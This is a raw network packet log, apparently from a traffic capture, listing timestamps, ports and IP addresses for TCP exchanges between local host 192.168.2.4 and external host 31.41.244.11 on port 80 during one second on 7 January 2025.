Jan 7, 2025 10:09:01.013535976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013561010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013569117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013587952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.013587952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.013587952 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.013746023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013756037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013766050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013776064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013793945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013796091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.013796091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.013806105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013838053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013847113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.013849974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.013849974 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.013915062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.013915062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.044848919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.044891119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.044900894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.044918060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.044922113 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.044941902 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.044960022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.044975042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.044984102 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045015097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045021057 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045025110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045037985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045047998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045047998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045083046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045083046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045084000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045095921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045113087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045123100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045133114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045139074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045139074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045142889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045171022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045212030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045216084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045222998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045233011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045243025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045273066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045299053 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045305014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045314074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045324087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.045345068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.045376062 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.071595907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.071675062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.071685076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.071682930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.071696043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.071731091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.071734905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.071746111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.071755886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.071764946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.071798086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.071822882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.097599983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.097610950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.097620964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.097651005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.097661018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.097667933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.097700119 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.097716093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.097727060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.097734928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.097774029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.097799063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098072052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098082066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098099947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098109007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098119974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098138094 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098164082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098217010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098227978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098242044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098251104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098262072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098272085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098290920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098290920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098320961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098339081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098349094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098359108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098367929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098381996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098386049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098406076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098421097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098462105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098468065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098479033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098489046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098499060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098509073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098522902 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098525047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098550081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098594904 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098623037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098630905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098673105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098699093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098723888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098736048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098745108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098754883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098764896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098774910 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098783970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098787069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098787069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098828077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098850965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098860979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098870993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098886967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098895073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098896980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098900080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.098923922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.098952055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099010944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099023104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099035978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099045038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099055052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099060059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099066973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099093914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099102974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099122047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099159956 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099215031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099225998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099242926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099255085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099263906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099268913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099268913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099275112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099288940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099299908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099309921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099328041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099328041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099369049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099601030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099615097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099633932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099643946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099656105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099656105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099668980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099673033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099683046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099704027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099736929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099770069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099780083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099792004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099821091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099852085 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099859953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099870920 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099881887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099895954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099935055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.099934101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099948883 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.099987984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100269079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100281000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100292921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100311041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100321054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100332022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100337029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100347042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100351095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100358963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100379944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100400925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100425959 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100492001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100502968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100543976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100553989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100585938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100595951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100606918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100630999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100630999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100663900 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100680113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100691080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100703001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.100742102 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.100786924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.131673098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131719112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131728888 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131737947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131747007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131758928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131786108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.131786108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.131799936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131829977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131840944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131850004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.131850004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.131892920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.131921053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131938934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.131968975 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.132010937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.132097006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132107019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132116079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132129908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132138968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132153034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132163048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132181883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132185936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.132185936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.132194996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132205963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132215023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132220984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.132220984 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.132225037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132236958 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.132283926 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.132283926 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.158451080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.158467054 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.158478022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.158488035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.158497095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.158507109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.158540964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.158540964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.158580065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.158590078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.158621073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.158680916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184438944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184451103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184462070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184511900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184513092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184513092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184525013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184554100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184552908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184565067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184573889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184608936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184608936 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184638977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184802055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184854031 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184864044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184875011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184885025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184912920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184914112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184931040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184931993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184942007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184952021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184973955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.184995890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.184995890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185035944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185072899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185082912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185092926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185102940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185112953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185137033 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185158014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185167074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185178995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185204029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185211897 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185223103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185241938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185266018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185266018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185342073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185353041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185362101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185374022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185389996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185394049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185399055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185410023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185414076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185425043 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185450077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185476065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185480118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185489893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185499907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185528040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185549021 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185570002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185580015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185589075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185595036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185600042 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185627937 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185662985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185663939 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.185743093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185751915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185767889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185777903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185786963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.185786963 CET	50017	80	192.168.2.4	31.41.244.11
